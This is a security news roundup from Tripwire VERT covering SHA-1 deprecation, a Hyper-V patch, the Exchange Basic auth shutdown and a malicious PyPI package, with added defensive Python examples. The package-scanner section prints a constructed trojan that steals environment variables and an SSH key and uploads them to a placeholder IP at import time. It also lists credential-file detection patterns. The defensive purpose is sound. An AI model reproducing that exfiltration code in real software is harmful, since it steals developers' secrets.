All of us at Tripwire’s Vulnerability Exposure and Research Team (VERT) are constantly looking out for interesting stories and developments in the infosec world. Here’s what cybersecurity news stood out to us during the week of December 19th, 2022. I’ve also included some comments on these stories.
NIST Recommends upgrading from SHA-1
The SHA-1 algorithm has reached the end of its usefulness, according to security experts at the National Institute of Standards and Technology (NIST), and is being put out to pasture. NIST now recommends that IT professionals replace all existing instances of SHA-1 with newer, more secure algorithms.
NIST is recommending that any organization still using the SHA-1 hashing algorithm transition to a SHA-2 or SHA-3 family algorithm by December 31, 2030. SHA-1 has not been considered secure for some time: practical collision attacks (two different inputs that produce the same digest) have been demonstrated since 2017. An attacker who controls both inputs can therefore prepare a benign-looking file and a malicious one that share a SHA-1 digest, get the benign one vetted or signed, and then substitute the malicious one without the hash changing. SHA-1 should not be used anywhere collision resistance matters, such as digital signatures, certificates, and integrity checks of software. Hashing algorithms like MD5 have already been retired by many organizations, and it only makes sense to reduce the use of legacy hashing algorithms.
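One practical consequence is that an integrity check must refuse a SHA-1 entry even when it matches, because a matching SHA-1 digest is no longer evidence that a file is the one that was vetted. The following is an added example written for this roundup, not code from NIST or Tripwire; the manifest format, the sample payload and the function names are assumptions made for illustration.

```python
import hashlib
import hmac

# Hash functions NIST no longer accepts for security use: MD5 long ago, SHA-1 by the end of 2030.
DEPRECATED_HASHES = {"md5", "sha1"}
# SHA-2 and SHA-3 family members accepted as replacements.
APPROVED_HASHES = {"sha256", "sha384", "sha512", "sha3_256", "sha3_384", "sha3_512"}


def normalize_algorithm(name: str) -> str:
    """Map common spellings to hashlib names: 'SHA-256' -> 'sha256', 'SHA3-256' -> 'sha3_256'."""
    return name.strip().lower().replace("sha3-", "sha3_").replace("-", "")


def integrity_digest(data: bytes, algorithm: str = "sha256") -> str:
    """Hex digest of `data`, refusing deprecated algorithms for integrity or signature use."""
    name = normalize_algorithm(algorithm)
    if name in DEPRECATED_HASHES:
        raise ValueError(f"{algorithm} is deprecated for security use; move to SHA-2 or SHA-3")
    if name not in APPROVED_HASHES:
        raise ValueError(f"unsupported algorithm: {algorithm}")
    return hashlib.new(name, data).hexdigest()


def verify_manifest(data: bytes, manifest: dict) -> dict:
    """Check `data` against a manifest of {algorithm: hexdigest} (format assumed for this example).

    Each entry gets a verdict: "ok", "mismatch" or "rejected". A deprecated entry is rejected
    even when its digest matches: an attacker who controls both files can make a benign and a
    malicious file collide under SHA-1, so a matching SHA-1 proves nothing about which one this is.
    """
    verdicts = {}
    for algorithm, expected in manifest.items():
        try:
            actual = integrity_digest(data, algorithm)
        except ValueError:
            verdicts[algorithm] = "rejected"
            continue
        # Constant-time comparison so the check does not leak how many leading bytes matched.
        verdicts[algorithm] = "ok" if hmac.compare_digest(actual, expected.lower()) else "mismatch"
    return verdicts


def is_trustworthy(verdicts: dict) -> bool:
    """Accept only when at least one approved digest verified and nothing mismatched."""
    values = set(verdicts.values())
    return "ok" in values and "mismatch" not in values


# Constructed sample: a payload and a legacy manifest that still carries a SHA-1 entry
# next to SHA-256. Digests are computed here so the sample is self-consistent.
SAMPLE = b"example firmware image v1.2\n"
LEGACY_MANIFEST = {
    "SHA-1": hashlib.sha1(SAMPLE).hexdigest(),      # would match, but is ignored
    "SHA-256": hashlib.sha256(SAMPLE).hexdigest(),
}

if __name__ == "__main__":
    print(verify_manifest(SAMPLE, LEGACY_MANIFEST))
    # {'SHA-1': 'rejected', 'SHA-256': 'ok'}
```

The point of `is_trustworthy` is that a manifest containing only SHA-1 entries yields no acceptance at all, which is the behaviour you want from build pipelines and update clients once the 2030 deadline is treated as already in force.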
Hyper-V Receives an Emergency Fix
Microsoft has released emergency out-of-band (OOB) Windows Server updates to address a known issue that appears after installing this month's Patch Tuesday updates, states Bleeping Computer. The flaw breaks virtual machine (VM) creation on Hyper-V hosts and affects only VMs managed with the System Center Virtual Machine Manager (SCVMM) and using Software Defined Networking (SDN).
This month’s Patch Tuesday updates broke VM creation on Hyper-V hosts that are managed by System Center Virtual Machine Manager and use Software Defined Networking. Windows Server 2019 and Windows Server 2022 are affected after installing the December patches. To resolve the issue, install KB5022554 on Windows Server 2019 or KB5022553 on Windows Server 2022. A workaround can be found here.
Basic Auth will be turned off for Exchange Online in January
Microsoft warned that in January 2023 it will permanently turn off Exchange Online basic authentication in order to improve security, Bleeping Computer noted on December 20th. "Beginning in early January, we will send Message Center posts to affected tenants about 7 days before we make the configuration change to permanently disable Basic auth use for protocols in scope," the Exchange Team reported on Tuesday.
Microsoft will be turning off basic authentication to improve the security of Exchange Online. Affected tenants will be notified by Message Center posts prior to the deactivation. Once it is deactivated, clients that have not migrated to a modern form of authentication will receive an HTTP 401 error when they try to authenticate. Basic authentication will not be turned back on for customers after it is deactivated.
It is recommended to move clients to a modern authentication mechanism (OAuth 2.0 based Modern Authentication) before the cut-off, and to inventory which accounts and client applications still send Basic credentials so that none are surprised by the 401s. If possible, enable multi-factor authentication as well. Basic authentication carries only a username and password, so it cannot enforce a second factor; that is a large part of why it is being retired. Multi-factor authentication makes it considerably harder for attackers holding a stolen password to authenticate without finding a bypass or convincing the user to approve the sign-in.
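Before the switch-off, the useful question is which accounts and which client software are still sending Basic credentials. The following is an added example written for this roundup, not code from Microsoft or Tripwire: it assumes a hypothetical reverse-proxy log format with one request per line, uses constructed sample lines, and recovers only the user-id from each Basic credential (RFC 7617 forbids a colon in the user-id, so the first colon is the separator) while discarding the password.

```python
import base64
from collections import Counter, defaultdict


def _basic(user: str, password: str) -> str:
    """Build a Basic credential the way a client would (used only to construct sample data)."""
    return base64.b64encode(f"{user}:{password}".encode()).decode()


# Constructed sample in a hypothetical log format (not Exchange Online's real logs):
# "<timestamp> <client_ip> <path> <user_agent> <auth_scheme> <credential>"
SAMPLE_REQUESTS = [
    "2022-12-20T09:01:12Z 198.51.100.7 /EWS/Exchange.asmx LegacyArchiver/3.1 Basic " + _basic("alice@example.com", "Hunter2!"),
    "2022-12-20T09:02:40Z 198.51.100.9 /Microsoft-Server-ActiveSync OldPhoneMail/1.0 Basic " + _basic("bob@example.com", "p4ss:word"),
    "2022-12-20T09:03:05Z 203.0.113.4 /EWS/Exchange.asmx Outlook/16.0 Bearer eyJhbGciOiJSUzI1NiJ9.example.signature",
    "2022-12-20T09:04:18Z 198.51.100.7 /EWS/Exchange.asmx LegacyArchiver/3.1 Basic " + _basic("alice@example.com", "Hunter2!"),
    "2022-12-20T09:05:00Z 198.51.100.12 /Autodiscover/Autodiscover.xml Scanner/0.1 Basic not-base64!!",
]


def basic_username(credential: str):
    """Return the user-id from a Basic credential, or None if it is not valid base64 or has no ':'.

    The password is decoded and thrown away; it must never end up in an inventory.
    """
    try:
        decoded = base64.b64decode(credential, validate=True).decode("utf-8")
    except (ValueError, UnicodeDecodeError):  # binascii.Error is a ValueError subclass
        return None
    user, sep, _password = decoded.partition(":")
    return user if sep else None


def parse_request(line: str):
    """Split one log line into its six fields; returns None for malformed lines."""
    parts = line.split(maxsplit=5)
    if len(parts) != 6:
        return None
    timestamp, client_ip, path, user_agent, scheme, credential = parts
    return {"timestamp": timestamp, "client_ip": client_ip, "path": path,
            "user_agent": user_agent, "scheme": scheme, "credential": credential}


def basic_auth_inventory(lines) -> dict:
    """Count requests per auth scheme and tabulate (user, client, endpoint) still on Basic.

    The "legacy" table is the migration work list: each row is an account plus a piece of client
    software that will start failing with HTTP 401 once Basic authentication is disabled.
    """
    counts = Counter()
    legacy = defaultdict(int)
    undecodable = 0
    for line in lines:
        req = parse_request(line)
        if req is None:
            continue
        counts[req["scheme"]] += 1
        if req["scheme"].lower() != "basic":
            continue
        user = basic_username(req["credential"])
        if user is None:
            undecodable += 1  # garbage credentials are worth a look too (scanners, broken clients)
            continue
        legacy[(user, req["user_agent"], req["path"])] += 1
    return {"counts": dict(counts), "legacy": dict(legacy), "undecodable_basic": undecodable}


if __name__ == "__main__":
    for row, hits in basic_auth_inventory(SAMPLE_REQUESTS)["legacy"].items():
        print(hits, *row)
```

Run over a real capture the output tells you both which mailboxes need an OAuth-capable client and which user agents (backup jobs, old phones, monitoring scripts) are the ones still speaking Basic.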
PyPI packages contain malicious data
Threat actors have published a malicious Python package on PyPI named ‘SentinelOne’, Bleeping Computer noted. Disguised as the legitimate SDK client for the actual American cybersecurity firm ‘SentinelOne’, it performs as expected – accessing the company’s API from within another project – but in reality is a trojanized attack that steals data from compromised systems.
Malicious packages have been hosted on package indexes and in Git repositories before. A “SentinelOne” package on PyPI claims to be a legitimate SDK, but it contains malicious content. The package claims to provide access to the SentinelOne API, and to keep that claim plausible it wraps a legitimate package from another project that actually talks to the API. The malicious package then tries to harvest sensitive data from the developer’s system. This package was discovered by ReversingLabs.
Malicious content can be published to public repositories without any review of the code. It is easy to trust familiar names, but malicious code can hide in plain sight. Review the code of a package before depending on it, pin the versions you have reviewed, and confirm through the vendor’s own documentation that a package is really the vendor’s SDK rather than a look-alike uploaded by someone else. Attackers usually pose as a legitimate source and deliver something genuinely useful; to avoid being noticed, they often wrap a real package so that the advertised functionality works while the theft happens in the background.
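The pattern described above, a wrapper that re-exports a real client while reading secrets and sending them off the host, is something static triage can catch before a package is installed. The following is an added example written for this roundup, not code from ReversingLabs, Tripwire or the package in question: it walks a module’s AST, resolves import aliases, and reports whether the module both reads sensitive material and uses a network sink, and whether anything executes at import time. Both sample sources are constructed for illustration; the call lists are a starting point, not a complete catalogue.

```python
import ast

# Calls or attributes that read material worth stealing from a developer machine.
SENSITIVE_READS = {
    "os.environ", "os.getenv", "os.path.expanduser", "getpass.getuser",
    "socket.gethostname", "platform.uname", "subprocess.run", "subprocess.check_output",
}
# Ways of sending data off the host.
NETWORK_SINKS = {
    "urllib.request.urlopen", "urllib.request.Request", "requests.get", "requests.post",
    "requests.put", "socket.socket", "http.client.HTTPConnection", "http.client.HTTPSConnection",
}
# Path fragments that point at credentials.
SENSITIVE_PATHS = (".ssh", ".aws", ".netrc", ".git-credentials", ".kube", ".docker/config.json")


def _alias_map(tree: ast.AST) -> dict:
    """Map local names to what they were imported as, so 'from os import environ' still resolves."""
    aliases = {}
    for node in ast.walk(tree):
        if isinstance(node, ast.Import):
            for alias in node.names:
                if alias.asname:
                    aliases[alias.asname] = alias.name
                else:  # "import urllib.request" binds the top-level name "urllib"
                    head = alias.name.split(".")[0]
                    aliases[head] = head
        elif isinstance(node, ast.ImportFrom) and node.module:
            for alias in node.names:
                aliases[alias.asname or alias.name] = f"{node.module}.{alias.name}"
    return aliases


def _dotted_name(node: ast.AST, aliases: dict):
    """Rebuild 'pkg.mod.attr' from an Attribute/Name chain, resolving import aliases."""
    parts = []
    while isinstance(node, ast.Attribute):
        parts.append(node.attr)
        node = node.value
    if not isinstance(node, ast.Name):
        return None
    parts.append(aliases.get(node.id, node.id))
    return ".".join(reversed(parts))


def scan_source(source: str) -> dict:
    """Static triage of one module: secret reads, network sinks, credential paths, import-time calls."""
    tree = ast.parse(source)
    aliases = _alias_map(tree)
    reads, sinks, paths = set(), set(), set()
    for node in ast.walk(tree):
        if isinstance(node, (ast.Attribute, ast.Name)):
            name = _dotted_name(node, aliases)
            if name in SENSITIVE_READS:
                reads.add(name)
            elif name in NETWORK_SINKS:
                sinks.add(name)
        elif isinstance(node, ast.Constant) and isinstance(node.value, str):
            if any(fragment in node.value for fragment in SENSITIVE_PATHS):
                paths.add(node.value)
    # Bare calls at module level run on 'import', i.e. the moment the package is first used.
    import_time = [
        _dotted_name(stmt.value.func, aliases) or "<call>"
        for stmt in tree.body
        if isinstance(stmt, ast.Expr) and isinstance(stmt.value, ast.Call)
    ]
    exfil_pattern = bool(sinks) and bool(reads or paths)
    return {
        "sensitive_reads": sorted(reads),
        "network_sinks": sorted(sinks),
        "sensitive_paths": sorted(paths),
        "import_time_calls": import_time,
        "verdict": "suspicious" if exfil_pattern else "no_exfil_pattern",
    }


# Constructed sample of a trojanized "SDK": re-exports a real client so the API works, then
# collects and uploads developer secrets at import time. Not the real malicious package.
TROJANIZED_SOURCE = '''
import os, json, urllib.request
from real_vendor_sdk import Client  # wrapped legitimate package keeps the advertised API working
__all__ = ["Client"]

def _collect():
    data = {"env": dict(os.environ)}
    with open(os.path.expanduser("~/.ssh/id_rsa")) as f:
        data["key"] = f.read()
    return data

def _beacon():
    req = urllib.request.Request("https://203.0.113.10/upload", data=json.dumps(_collect()).encode())
    urllib.request.urlopen(req)

_beacon()
'''

# Constructed sample of an honest client: network access, but no secret reads and no import-time code.
BENIGN_SOURCE = '''
import requests

class Client:
    def __init__(self, token):
        self.token = token

    def get(self, path):
        return requests.get("https://api.example.com" + path, headers={"Authorization": self.token})
'''
```

An honest SDK talks to the network, so a network sink alone is not a finding; the combination with environment or key-file reads, especially in code that runs at import time rather than inside a method the developer calls, is what separates the two samples. Run `scan_source` over every `.py` file of a downloaded sdist or wheel before it goes anywhere near `pip install`.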
Keep in Touch with Tripwire VERT
Want more insights from Tripwire VERT before our next cybersecurity news roundup comes out? Subscribe to our newsletter here.